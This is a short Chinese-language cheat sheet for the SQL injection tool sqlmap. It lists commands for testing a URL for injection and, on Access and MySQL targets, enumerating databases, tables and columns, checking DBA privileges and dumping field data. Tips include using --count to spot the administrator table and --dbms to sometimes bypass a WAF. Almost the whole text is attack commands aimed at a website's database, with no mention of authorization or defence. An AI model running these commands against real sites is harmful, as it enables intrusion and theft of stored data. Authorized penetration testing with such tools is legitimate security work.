sqlmap可謂是利用sql注入的神器了,sqlmap的參數很多,接下介紹幾種常見的參數。
一。注入access數據庫常用的參數
sqlmap.py -u "url" //判斷參數是否存在注入
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段數據
二。注入MySQL數據庫常用參數
sqlmap.py -u "url" //判斷參數是否存在注入
sqlmap.py -u "url" --current-db //查看網站當前數據庫
sqlmap.py -u "url" --is-dba //查看當前用戶權限
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段數據
三。一些常用參數集合
-h //查看幫助選項
--dbs //查看網站所有數據庫
--users //查看所有數據庫的用戶
--count //統計條數 (該條命令可用在爆表名的時候,便於查看哪個是管理員的表)
--level //測試等級(1-5)默認是1,cookie注入是2,http頭注入是3
--dbms=mysql/oracle/mssql 指定數據庫(這樣既可以節省時間,在某些時候也可以繞過waf)
sqlmap.py -u “url”--batch --exclude-sysdbs //batch是使用sqlmap默認選項,不用按回車;exclude-sysdbs是排除系統自帶的數據庫